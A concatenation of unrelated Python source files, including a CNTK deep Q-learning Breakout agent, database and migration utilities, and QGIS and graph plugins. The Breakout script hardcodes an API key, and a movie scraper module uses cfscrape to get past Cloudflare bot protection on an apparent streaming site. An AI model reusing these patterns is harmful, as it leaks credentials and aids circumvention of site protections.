self.learning_rate = cntk.learner.training_parameter_schedule(0.0001, cntk.UnitType.sample)
self.momentum = cntk.learner.momentum_as_time_constant_schedule(0.99)
self.loss = cntk.ops.reduce_mean(cntk.ops.square(self.model - q_target), axis=0)
mean_error = cntk.ops.reduce_mean(cntk.ops.square(self.model - q_target), axis=0)
learner = cntk.adam_sgd(self.model.parameters, self.learning_rate, momentum=self.momentum)
self.trainer = cntk.Trainer(self.model, self.loss, mean_error, learner)
def train(self, x, y):
data = dict(zip(self.loss.arguments, [y, x]))
self.trainer.train_minibatch(data, outputs=[self.loss.output])
def predict(self, s):
return self.model.eval([s])
@staticmethod
def create_multi_layer_neural_network(input_vars, out_dims, num_hidden_layers):
num_hidden_neurons = 128
hidden_layer = lambda: Dense(num_hidden_neurons, activation=cntk.ops.relu)
output_layer = Dense(out_dims, activation=None)
model = Sequential([LayerStack(num_hidden_layers, hidden_layer),
output_layer])(input_vars)
return model
@staticmethod
def create_convolutional_neural_network(input_vars, out_dims):
convolutional_layer_1 = Convolution((5, 5), 32, strides=1, activation=cntk.ops.relu, pad=True,
init=glorot_normal(), init_bias=0.1)
pooling_layer_1 = MaxPooling((2, 2), strides=(2, 2), pad=True)
convolutional_layer_2 = Convolution((5, 5), 64, strides=1, activation=cntk.ops.relu, pad=True,
init=glorot_normal(), init_bias=0.1)
pooling_layer_2 = MaxPooling((2, 2), strides=(2, 2), pad=True)
convolutional_layer_3 = Convolution((5, 5), 128, strides=1, activation=cntk.ops.relu, pad=True,
init=glorot_normal(), init_bias=0.1)
pooling_layer_3 = MaxPooling((2, 2), strides=(2, 2), pad=True)
fully_connected_layer = Dense(1024, activation=cntk.ops.relu, init=glorot_normal(), init_bias=0.1)
output_layer = Dense(out_dims, activation=None, init=glorot_normal(), init_bias=0.1)
model = Sequential([convolutional_layer_1, pooling_layer_1,
convolutional_layer_2, pooling_layer_2,
#convolutional_layer_3, pooling_layer_3,
fully_connected_layer,
output_layer])(input_vars)
return model
class Memory:
def __init__(self, capacity):
self.examplers = deque(maxlen=capacity)
self.capacity = capacity
def add(self, sample):
self.examplers.append(sample)
def get_random_samples(self, num_samples):
num_samples = min(num_samples, len(self.examplers))
return random.sample(tuple(self.examplers), num_samples)
def get_stack(self, start_index, stack_size):
end_index = len(self.examplers) - stack_size
if end_index < 0:
stack = list(self.examplers) + [self.examplers[-1] for _ in range(-end_index)]
else:
start_index = min(start_index, end_index)
stack = [self.examplers[i + start_index] for i in range(stack_size)]
return np.stack(stack, axis=-1)
def get_random_stacks(self, num_samples, stack_size):
start_indices = random.sample(range(len(self.examplers)), num_samples)
return [self.get_stack(start_index, stack_size) for start_index in start_indices]
def get_latest_stack(self, stack_size):
return self.get_stack(len(self.examplers), stack_size)
class Agent:
MEMORY_CAPACITY = 100000
DISCOUNT_FACTOR = 0.99
MAX_EXPLORATION_RATE = 1.0
MIN_EXPLORATION_RATE = 0.01
DECAY_RATE = 0.0001
def __init__(self):
self.explore_rate = self.MAX_EXPLORATION_RATE
self.brain = Brain()
self.memory = Memory(self.MEMORY_CAPACITY)
self.steps = 0
def act(self, s):
if random.random() < self.explore_rate:
return random.randint(0, NUM_ACTIONS - 1)
else:
return np.argmax(self.brain.predict(s))
def observe(self, sample):
self.steps += 1
self.memory.add(sample)
# Reduces exploration rate linearly
self.explore_rate = self.MIN_EXPLORATION_RATE + (self.MAX_EXPLORATION_RATE - self.MIN_EXPLORATION_RATE) * math.exp(-self.DECAY_RATE * self.steps)
def replay(self):
batch = self.memory.get_random_samples(self.brain.BATCH_SIZE)
batch_len = len(batch)
states = np.array([sample[0] for sample in batch], dtype=np.float32)
no_state = np.zeros(STATE_DIMS)
resultant_states = np.array([(no_state if sample[3] is None else sample[3]) for sample in batch], dtype=np.float32)
q_values_batch = self.brain.predict(states)
future_q_values_batch = self.brain.predict(resultant_states)
x = np.zeros((batch_len, ) + STATE_DIMS).astype(np.float32)
y = np.zeros((batch_len, NUM_ACTIONS)).astype(np.float32)
for i in range(batch_len):
state, action, reward, resultant_state = batch[i]
q_values = q_values_batch[0][i]
if resultant_state is None:
q_values[action] = reward
else:
q_values[action] = reward + self.DISCOUNT_FACTOR * np.amax(future_q_values_batch[0][i])
x[i] = state
y[i] = q_values
self.brain.train(x, y)
@classmethod
def action_from_output(cls, output_array):
return np.argmax(output_array)
def run_simulation(agent, solved_reward_level):
state = env.reset()
state = preprocess_image(state)
total_rewards = 0
time_step = 0
while True:
#env.render()
time_step += 1
action = agent.act(state.astype(np.float32))
resultant_state, reward, done, info = env.step(action)
resultant_state = preprocess_image(resultant_state)
if done: # terminal state
resultant_state = None
agent.observe((state, action, reward, resultant_state))
agent.replay()
state = resultant_state
total_rewards += reward
if total_rewards > solved_reward_level or done:
return total_rewards, time_step
def test(model_path, num_episodes=10):
root = cntk.load_model(model_path)
observation = env.reset() # reset environment for new episode
done = False
for episode in range(num_episodes):
while not done:
try:
env.render()
except Exception:
# this might fail on a VM without OpenGL
pass
observation = preprocess_image(observation)
action = np.argmax(root.eval(observation.astype(np.float32)))
observation, reward, done, info = env.step(action)
if done:
observation = env.reset() # reset environment for new episode
if __name__ == "__main__":
# Ensure we always get the same amount of randomness
np.random.seed(0)
GYM_ENABLE_UPLOAD = False
GYM_VIDEO_PATH = os.path.join(os.getcwd(), "videos", "atari_breakout_dpn_cntk")
GYM_API_KEY = "sk_93AMQvdmReWCi8pdL4m6Q"
MAX_NUM_EPISODES = 1000
STREAK_TO_END = 120
DONE_REWARD_LEVEL = 50
TRAINED_MODEL_DIR = os.path.join(os.getcwd(), "trained_models")
if not os.path.exists(TRAINED_MODEL_DIR):
os.makedirs(TRAINED_MODEL_DIR)
TRAINED_MODEL_NAME = "atari_breakout_dpn.mod"
EPISODES_PER_PRINT_PROGRESS = 1
EPISODES_PER_SAVE = 5
if len(sys.argv) < 2 or sys.argv[1] != "test_only":
if GYM_ENABLE_UPLOAD:
env.monitor.start(GYM_VIDEO_PATH, force=True)
agent = Agent()
episode_number = 0
num_streaks = 0
reward_sum = 0
time_step_sum = 0
solved_episode = -1
training_start_time = perf_counter()
while episode_number < MAX_NUM_EPISODES:
# Run the simulation and train the agent
reward, time_step = run_simulation(agent, DONE_REWARD_LEVEL*2)
reward_sum += reward
time_step_sum += time_step
episode_number += 1
if episode_number % EPISODES_PER_PRINT_PROGRESS == 0:
t = perf_counter() - training_start_time
print("(%d s) Episode: %d, Average reward = %.3f, Average number of time steps = %.3f."
% (t, episode_number, reward_sum / EPISODES_PER_PRINT_PROGRESS, time_step_sum/EPISODES_PER_PRINT_PROGRESS))
reward_sum = 0
time_step_sum = 0
# It is considered solved when the sum of reward is over 200
if reward > DONE_REWARD_LEVEL:
num_streaks += 1
solved_episode = episode_number
else:
num_streaks = 0
solved_episode = -1
# It's considered done when it's solved over 120 times consecutively
if num_streaks > STREAK_TO_END:
print("Task solved in %d episodes and repeated %d times." % (episode_number, num_streaks))
break
if episode_number % EPISODES_PER_SAVE == 0:
agent.brain.model.save_model(os.path.join(TRAINED_MODEL_DIR, TRAINED_MODEL_NAME), False)
agent.brain.model.save_model(os.path.join(TRAINED_MODEL_DIR, TRAINED_MODEL_NAME), False)
if GYM_ENABLE_UPLOAD:
env.monitor.close()
gym.upload(GYM_VIDEO_PATH, api_key=GYM_API_KEY)
# testing the model
test(os.path.join(TRAINED_MODEL_DIR, TRAINED_MODEL_NAME), num_episodes=10)
|
sunrin92/LearnPython
|
1-lpthw/ex32.py
|
the_count = [1, 2, 3, 4, 5]
fruits = ['apple', 'oranges', 'pears', 'apricots',]
change = [1, 'pennies', 2, 'dimes', 3, 'quarters',]
#this first kind of for-loop goes through a list
for number in the_count:
print("This is count %d" % number)
# same as above
for fruit in fruits:
print("A fruit of type: %s" % fruit)
# also we can go through mixed lists too
# notice we have to use %r since we don't know what's in it
for i in change:
print("I got %r " % i)
# we can alse build lists, first start with an empty one
elements = []
# then use the range function to do 0 to 5 counts
for i in range(0,6):
print("Adding %d to the list." % i)
# append is a function that lists understand
elements.append(i)
# now we can print them out too
for i in elements:
print("Element was: %d" % i)
|
fedspendingtransparency/data-act-validator
|
dataactvalidator/migrations/versions/c0a714ade734_adding_timestamps_to_all_tables.py
|
"""adding timestamps to all tables
Revision ID: c0a714ade734
Revises: 1a886e694fca
Create Date: 2016-04-20 14:46:06.407765
"""
# revision identifiers, used by Alembic.
revision = 'c0a714ade734'
down_revision = '1a886e694fca'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
def upgrade(engine_name):
globals()["upgrade_%s" % engine_name]()
def downgrade(engine_name):
globals()["downgrade_%s" % engine_name]()
def upgrade_validation():
### commands auto generated by Alembic - please adjust! ###
op.add_column('field_type', sa.Column('created_at', sa.DateTime(), nullable=True))
op.add_column('field_type', sa.Column('updated_at', sa.DateTime(), nullable=True))
op.add_column('file_columns', sa.Column('created_at', sa.DateTime(), nullable=True))
op.add_column('file_columns', sa.Column('updated_at', sa.DateTime(), nullable=True))
op.add_column('file_type', sa.Column('created_at', sa.DateTime(), nullable=True))
op.add_column('file_type', sa.Column('updated_at', sa.DateTime(), nullable=True))
op.add_column('multi_field_rule', sa.Column('created_at', sa.DateTime(), nullable=True))
op.add_column('multi_field_rule', sa.Column('updated_at', sa.DateTime(), nullable=True))
op.add_column('multi_field_rule_type', sa.Column('created_at', sa.DateTime(), nullable=True))
op.add_column('multi_field_rule_type', sa.Column('updated_at', sa.DateTime(), nullable=True))
op.add_column('rule', sa.Column('created_at', sa.DateTime(), nullable=True))
op.add_column('rule', sa.Column('updated_at', sa.DateTime(), nullable=True))
op.add_column('rule_timing', sa.Column('created_at', sa.DateTime(), nullable=True))
op.add_column('rule_timing', sa.Column('updated_at', sa.DateTime(), nullable=True))
op.add_column('rule_type', sa.Column('created_at', sa.DateTime(), nullable=True))
op.add_column('rule_type', sa.Column('updated_at', sa.DateTime(), nullable=True))
op.add_column('tas_lookup', sa.Column('created_at', sa.DateTime(), nullable=True))
op.add_column('tas_lookup', sa.Column('updated_at', sa.DateTime(), nullable=True))
### end Alembic commands ###
def downgrade_validation():
### commands auto generated by Alembic - please adjust! ###
op.drop_column('tas_lookup', 'updated_at')
op.drop_column('tas_lookup', 'created_at')
op.drop_column('rule_type', 'updated_at')
op.drop_column('rule_type', 'created_at')
op.drop_column('rule_timing', 'updated_at')
op.drop_column('rule_timing', 'created_at')
op.drop_column('rule', 'updated_at')
op.drop_column('rule', 'created_at')
op.drop_column('multi_field_rule_type', 'updated_at')
op.drop_column('multi_field_rule_type', 'created_at')
op.drop_column('multi_field_rule', 'updated_at')
op.drop_column('multi_field_rule', 'created_at')
op.drop_column('file_type', 'updated_at')
op.drop_column('file_type', 'created_at')
op.drop_column('file_columns', 'updated_at')
op.drop_column('file_columns', 'created_at')
op.drop_column('field_type', 'updated_at')
op.drop_column('field_type', 'created_at')
### end Alembic commands ###
|
jleclanche/pywow
|
wdbc/main.py
|
from cStringIO import StringIO
from struct import pack, unpack, error as StructError
from .log import log
from .structures import fields
class DBFile(object):
"""
Base class for WDB and DBC files
"""
@classmethod
def open(cls, file, build, structure, environment):
if isinstance(file, basestring):
file = open(file, "rb")
instance = cls(file, build, environment)
instance._readHeader()
instance.setStructure(structure)
instance._rowDynamicFields = 0 # Dynamic fields index, used when parsing a row
instance._readAddresses()
return instance
def __init__(self, file=None, build=None, environment=None):
self._addresses = {}
self._values = {}
self.file = file
self.build = build
self.environment = environment
def __repr__(self):
return "%s(file=%r, build=%r)" % (self.__class__.__name__, self.file, self.build)
def __contains__(self, id):
return id in self._addresses
def __getitem__(self, item):
if isinstance(item, slice):
keys = sorted(self._addresses.keys())[item]
return [self[k] for k in keys]
if item not in self._values:
self._parse_row(item)
return self._values[item]
def __setitem__(self, item, value):
if not isinstance(item, int):
raise TypeError("DBFile indices must be integers, not %s" % (type(item)))
if isinstance(value, DBRow):
self._values[item] = value
self._addresses[item] = -1
else:
# FIXME technically we should allow DBRow, but this is untested and will need resetting parent
raise TypeError("Unsupported type for DBFile.__setitem__: %s" % (type(value)))
def __delitem__(self, item):
if item in self._values:
del self._values[item]
del self._addresses[item]
def __iter__(self):
return self._addresses.__iter__()
def __len__(self):
return len(self._addresses)
def _add_row(self, id, address, reclen):
if id in self._addresses: # Something's wrong here
log.warning("Multiple instances of row %r found in %s" % (id, self.file.name))
self._addresses[id] = (address, reclen)
def _parse_field(self, data, field, row=None):
"""
Parse a single field in stream.
"""
if field.dyn > self._rowDynamicFields:
return None # The column doesn't exist in this row, we set it to None
ret = None
try:
if isinstance(field, fields.StringField):
ret = self._parse_string(data)
elif isinstance(field, fields.DataField): # wowcache.wdb
length = getattr(row, field.master)
ret = data.read(length)
elif isinstance(field, fields.DynamicMaster):
ret, = unpack("<I", data.read(4))
self._rowDynamicFields = ret
else:
ret, = unpack("<%s" % (field.char), data.read(field.size))
except StructError:
log.warning("Field %s could not be parsed properly" % (field))
ret = None
return ret
def supportsSeeking(self):
return hasattr(self.file, "seek")
def append(self, row):
"""
Append a row at the end of the file.
If the row does not have an id, one is automatically assigned.
"""
i = len(self) + 1 # FIXME this wont work properly in incomplete files
if "_id" not in row:
row["_id"] = i
self[i] = row
def clear(self):
"""
Delete every row in the file
"""
for k in self.keys(): # Use key, otherwise we get RuntimeError: dictionary changed size during iteration
del self[k]
def keys(self):
return self._addresses.keys()
def items(self):
return [(k, self[k]) for k in self]
def parse_row(self, data, reclen=0):
"""
Assign data to a DBRow instance
"""
return DBRow(self, data=data, reclen=reclen)
def values(self):
"""
Return a list of the file's values
"""
return [self[id] for id in self]
def setRow(self, key, **values):
self.__setitem__(key, DBRow(self, columns=values))
def size(self):
if hasattr(self.file, "size"):
return self.file.size()
elif isinstance(self.file, file):
from os.path import getsize
return getsize(self.file.name)
raise NotImplementedError
def update(self, other):
"""
Update file from iterable other
"""
for k in other:
self[k] = other[k]
def write(self, filename=""):
"""
Write the file data on disk. If filename is not given, use currently opened file.
"""
_filename = filename or self.file.name
data = self.header.data() + self.data() + self.eof()
f = open(_filename, "wb") # Don't open before calling data() as uncached rows would be empty
f.write(data)
f.close()
log.info("Written %i bytes at %s" % (len(data), f.name))
if not filename: # Reopen self.file, we modified it
# XXX do we need to wipe self._values here?
self.file.close()
self.file = open(f.name, "rb")
class DBRow(list):
"""
A database row.
Names of the variables of that class should not be used in field names of structures
"""
initialized = False
def __init__(self, parent, data=None, columns=None, reclen=0):
self._parent = parent
self._values = {} # Columns values storage
self.structure = parent.structure
self.initialized = True # needed for __setattr__
if columns:
if type(columns) == list:
self.extend(columns)
elif type(columns) == dict:
self._default()
_cols = [k.name for k in self.structure]
for k in columns:
try:
self[_cols.index(k)] = columns[k]
except ValueError:
log.warning("Column %r not found" % (k))
elif data:
dynfields = 0
data = StringIO(data)
for field in self.structure:
_data = parent._parse_field(data, field, self)
self.append(_data)
if reclen:
real_reclen = reclen + self._parent.row_header_size
if data.tell() != real_reclen:
log.warning("Reclen not respected for row %r. Expected %i, read %i. (%+i)" % (self.id, real_reclen, data.tell(), real_reclen-data.tell()))
def __dir__(self):
result = self.__dict__.keys()
result.extend(self.structure.column_names)
return result
def __getattr__(self, attr):
if attr in self.structure:
return self._get_value(attr)
if attr in self.structure._abstractions: # Union abstractions etc
field, func = self.structure._abstractions[attr]
return func(field, self)
if "__" in attr:
return self._query(attr)
return super(DBRow, self).__getattribute__(attr)
def __int__(self):
return self.id
def __setattr__(self, attr, value):
# Do not preserve the value in DBRow! Use the save method to save.
if self.initialized and attr in self.structure:
self._set_value(attr, value)
return super(DBRow, self).__setattr__(attr, value)
def __setitem__(self, index, value):
if not isinstance(index, int):
raise TypeError("Expected int instance, got %s instead (%r)" % (type(index), index))
list.__setitem__(self, index, value)
col = self.structure[index]
self._values[col.name] = col.to_python(value, row=self)
def _get_reverse_relation(self, table, field):
"""
Return a list of rows matching the reverse relation
"""
if not hasattr(self._parent, "_reverse_relation_cache"):
self._parent._reverse_relation_cache = {}
cache = self._parent._reverse_relation_cache
tfield = table + "__" + field
if tfield not in cache:
cache[tfield] = {}
# First time lookup, let's build the cache
table = self._parent.environment.dbFile(table)
for row in table:
row = table[row]
id = row._raw(field)
if id not in cache[tfield]:
cache[tfield][id] = []
cache[tfield][id].append(row)
return cache[tfield].get(self.id, None)
def _matches(self, **kwargs):
for k, v in kwargs.items():
if not self._query(k, v):
return False
return True
def _query(self, rel, value=None):
"""
Parse a django-like multilevel relationship
"""
rels = rel.split("__")
if "" in rels: # empty string
raise ValueError("Invalid relation string")
first = rels[0]
if not hasattr(self, first):
if self._parent.environment.hasDbFile(first):
# Handle reverse relations, eg spell__item for item table
remainder = rel[len(first + "__"):]
return self._get_reverse_relation(first, remainder)
raise ValueError("Invalid relation string")
ret = self
rels = rels[::-1]
special = {
"contains": lambda x, y: x in y,
"exact": lambda x, y: x == y,
"icontains": lambda x, y: x.lower() in y.lower(),
"iexact": lambda x, y: x.lower() == y.lower(),
"gt": lambda x, y: x > y,
"gte": lambda x, y: x >= y,
"lt": lambda x, y: x < y,
"lte": lambda x, y: x <= y,
}
while rels:
if rels[-1] in special:
if len(rels) != 1:
# icontains always needs to be the last piece of the relation string
raise ValueError("Invalid relation string")
return special[rels[-1]](value, ret)
else:
ret = getattr(ret, rels.pop())
return ret
def _set_value(self, name, value):
index = self.structure.index(name)
col = self.structure[index]
self._values[name] = col.to_python(value, self)
self[index] = value
def _get_value(self, name):
if name not in self._values:
raw_value = self[self.structure.index(name)]
self._set_value(name, raw_value)
return self._values[name]
def _raw(self, name):
"""
Returns the raw value from field 'name'
"""
index = self.structure.index(name)
return self[index]
def _save(self):
for name in self._values:
index = self.structure.index(name)
col = self.structure[index]
self[index] = col.from_python(self._values[name])
def _field(self, name):
"""
Returns the field 'name'
"""
index = self.structure.index(name)
return self.structure[index]
def _default(self):
"""
Change all fields to their default values
"""
del self[:]
self._values = {}
for col in self.structure:
char = col.char
if col.dyn:
self.append(None)
elif char == "s":
self.append("")
elif char == "f":
self.append(0.0)
else:
self.append(0)
def dict(self):
"""
Return a dict of the row as colname: value
"""
return dict(zip(self.structure.column_names, self))
def update(self, other):
for k in other:
self[k] = other[k]
@property
def id(self):
"Temporary hack to transition between _id and id"
return self._id
|
boniatillo-com/PhaserEditor
|
docs/v2/conf.py
|
# -*- coding: utf-8 -*-
#
# Phaser Editor documentation build configuration file, created by
# sphinx-quickstart on Thu May 25 08:35:14 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
#'rinoh.frontend.sphinx'
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Phaser Editor 2D'
copyright = u'2016-2020, Arian Fornaris'
author = u'Arian Fornaris'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = u'2.1.7'
# The full version, including alpha/beta/rc tags.
release = u'2.1.7'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
# pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
#import sphinx_rtd_theme
html_theme = "phaser-editor"
# Uncomment for generate Eclipse Offline Help
#html_theme = "eclipse-help"
html_theme_path = ["_themes"]
html_show_sourcelink = False
html_show_sphinx = False
html_favicon = "logo.png"
html_title = "Phaser Editor Help"
html_show_copyright = True
print(html_theme_path)
#html_theme = 'classic'
highlight_language = 'javascript'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'PhaserEditordoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
'preamble': '',
# Latex figure (float) alignment
#
'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'PhaserEditor2D.tex', u'Phaser Editor 2D Documentation',
u'Arian Fornaris', 'manual'),
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'PhaserEditor2D', u'Phaser Editor 2D Documentation',
author, 'Arian', 'A friendly HTML5 game IDE.',
'Miscellaneous'),
]
|
camptocamp/QGIS
|
python/plugins/processing/saga/SplitRGBBands.py
|
# -*- coding: utf-8 -*-
"""
***************************************************************************
SplitRGBBands.py
---------------------
Date : August 2012
Copyright : (C) 2012 by Victor Olaya
Email : volayaf at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
from processing.tools.system import *
from processing.tools import dataobjects
from processing.saga.SagaUtils import SagaUtils
__author__ = 'Victor Olaya'
__date__ = 'August 2012'
__copyright__ = '(C) 2012, Victor Olaya'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
from PyQt4 import QtGui
from processing.core.GeoAlgorithm import GeoAlgorithm
from processing.parameters.ParameterRaster import ParameterRaster
from processing.outputs.OutputRaster import OutputRaster
import os
class SplitRGBBands(GeoAlgorithm):
INPUT = "INPUT"
R = "R"
G = "G"
B = "B"
def getIcon(self):
return QtGui.QIcon(os.path.dirname(__file__) + "/../images/saga.png")
def defineCharacteristics(self):
self.name = "Split RGB bands"
self.group = "Grid - Tools"
self.addParameter(ParameterRaster(SplitRGBBands.INPUT, "Input layer", False))
self.addOutput(OutputRaster(SplitRGBBands.R, "Output R band layer"))
self.addOutput(OutputRaster(SplitRGBBands.G, "Output G band layer"))
self.addOutput(OutputRaster(SplitRGBBands.B, "Output B band layer"))
def processAlgorithm(self, progress):
#TODO:check correct num of bands
input = self.getParameterValue(SplitRGBBands.INPUT)
temp = getTempFilename(None).replace('.','');
basename = os.path.basename(temp)
validChars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
safeBasename = ''.join(c for c in basename if c in validChars)
temp = os.path.join(os.path.dirname(temp), safeBasename)
r = self.getOutputValue(SplitRGBBands.R)
g = self.getOutputValue(SplitRGBBands.G)
b = self.getOutputValue(SplitRGBBands.B)
commands = []
if isWindows():
commands.append("io_gdal 0 -GRIDS \"" + temp + "\" -FILES \"" + input+"\"")
commands.append("io_gdal 1 -GRIDS \"" + temp + "_0001.sgrd\" -FORMAT 1 -TYPE 0 -FILE \"" + r + "\"");
commands.append("io_gdal 1 -GRIDS \"" + temp + "_0002.sgrd\" -FORMAT 1 -TYPE 0 -FILE \"" + g + "\"");
commands.append("io_gdal 1 -GRIDS \"" + temp + "_0003.sgrd\" -FORMAT 1 -TYPE 0 -FILE \"" + b + "\"");
else:
commands.append("libio_gdal 0 -GRIDS \"" + temp + "\" -FILES \"" + input + "\"")
commands.append("libio_gdal 1 -GRIDS \"" + temp + "_0001.sgrd\" -FORMAT 1 -TYPE 0 -FILE \"" + r + "\"");
commands.append("libio_gdal 1 -GRIDS \"" + temp + "_0002.sgrd\" -FORMAT 1 -TYPE 0 -FILE \"" + g + "\"");
commands.append("libio_gdal 1 -GRIDS \"" + temp + "_0003.sgrd\" -FORMAT 1 -TYPE 0 -FILE \"" + b + "\"");
SagaUtils.createSagaBatchJobFileFromSagaCommands(commands)
SagaUtils.executeSaga(progress);
|
ulethHCI/GLuskap
|
plugins/moment_curve.py
|
#!/usr/bin/python2.3
# This is the short name of the plugin, used as the menu item
# for the plugin.
# If not specified, the name of the file will be used.
shortname = "Moment Curve layout (Cohen et al. 1995)"
# This is the long name of the plugin, used as the menu note
# for the plugin.
# If not specified, the short name will be used.
name = "Moment Curve layout, O(n^3)"
DEBUG = False
def run(context, UI):
"""
Run this plugin.
"""
if len(context.graph.vertices) < 1:
generate = True
else:
res = UI.prYesNo("Use current graph?",
"Would you like to apply the layout to the current graph? If not, a complete graph will be generated and the current graph cleared.")
if res:
generate = False
# Go through and eliminate any existing bend points
from graph import DummyVertex
for v in [x for x in context.graph.vertices if isinstance(x, DummyVertex)]:
context.graph.removeVertex(v)
else:
generate = True
if generate:
N = UI.prType("Number of Vertices", "Input number of vertices to generate complete graph:", int, 4)
if N == None:
return True
while N < 0:
N = UI.prType("Number of Vertices",
"Please input positive value.\n\nInput number of vertices to generate complete graph:", int,
N)
if N == None:
return True
context.graph.clear()
# Generate a complete graph
k_n(context, N)
res = UI.prYesNo("Use mod-p layout?",
"Would you like to use the mod-p compact layout (O(n^3) volume)? If not, the O(n^6) uncompacted layout will be used.")
# Lay it out according to the 1bend layout
moment(context, compact=res)
context.camera.lookAtGraph(context.graph, context.graph.centerOfMass(), offset=context.graph.viewpoint())
return True
def k_n(C, n):
"""
k_n (C, n) -> void
Create a complete graph on n vertices in context C.
"""
from graph import Vertex, DummyVertex
G = C.graph
G.clear()
# Add n vertices
for i in range(n):
G.addVertex(Vertex(id='%d' % i, name='v%d' % i))
# For every pair of vertices (u, v):
for u in G.vertices:
for v in G.vertices:
# ignoring duplicates and u==v
if (u, v) not in G.edges and (v, u) not in G.edges and u != v:
# add an edge between u and v
G.addEdge((u, v))
def moment(C, compact=False):
"""
Run moment curve layout (Cohen, Eades, Lin, Ruskey 1995).
"""
G = C.graph
from math import sqrt, ceil, floor
from graph import DummyVertex, GraphError
import colorsys
vertices = [x for x in G.vertices if not isinstance(x, DummyVertex)]
n = len(vertices)
# Choose a prime p with n < p <= 2n
for p in range(n + 1, 2 * n + 1):
for div in range(2, p / 2):
if p % div == 0:
# print "%d is not a prime (div by %d)" % (p, div)
break
else:
# We did not find a divisor
# print "%d is a prime!" % p
break
else:
# Can't happen!
raise Exception, "Can't find a prime between %d and %d!" % (n + 1, 2 * n)
# Position each vertex
if compact:
for i in range(n):
G.modVertex(vertices[i]).pos = (i * 10, ((i * i) % p) * 10, ((i * i * i) % p) * 10)
else:
for i in range(n):
G.modVertex(vertices[i]).pos = (i, (i * i), (i * i * i))
return
|
repotvsupertuga/tvsupertuga.repository
|
script.module.openscrapers/lib/openscrapers/sources_openscrapers/en/coolmoviezone.py
|
# -*- coding: utf-8 -*-
# ..#######.########.#######.##....#..######..######.########....###...########.#######.########..######.
# .##.....#.##.....#.##......###...#.##....#.##....#.##.....#...##.##..##.....#.##......##.....#.##....##
# .##.....#.##.....#.##......####..#.##......##......##.....#..##...##.##.....#.##......##.....#.##......
# .##.....#.########.######..##.##.#..######.##......########.##.....#.########.######..########..######.
# .##.....#.##.......##......##..###.......#.##......##...##..########.##.......##......##...##........##
# .##.....#.##.......##......##...##.##....#.##....#.##....##.##.....#.##.......##......##....##.##....##
# ..#######.##.......#######.##....#..######..######.##.....#.##.....#.##.......#######.##.....#..######.
'''
OpenScrapers Project
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import re
from openscrapers.modules import cleantitle, source_utils, cfscrape
class source:
def __init__(self):
self.priority = 1
self.language = ['en']
self.domains = ['coolmoviezone.online']
self.base_link = 'https://coolmoviezone.online'
self.scraper = cfscrape.create_scraper()
def movie(self, imdb, title, localtitle, aliases, year):
try:
title = cleantitle.geturl(title)
url = self.base_link + '/%s-%s' % (title, year)
return url
except:
return
def sources(self, url, hostDict, hostprDict):
try:
sources = []
r = self.scraper.get(url).content
match = re.compile('<td align="center"><strong><a href="(.+?)"').findall(r)
for url in match:
host = url.split('//')[1].replace('www.', '')
host = host.split('/')[0].split('.')[0].title()
quality = source_utils.check_sd_url(url)
sources.append({'source': host, 'quality': quality, 'language': 'en', 'url': url, 'direct': False,
'debridonly': False})
except Exception:
return
return sources
def resolve(self, url):
return url
|
ketan-analytics/learnpython
|
Safaribookonline-Python/courseware-btb/solutions/py3/patterns/properties_extra.py
|
'''
Ohm's law is a simple equation describing electrical circuits. It
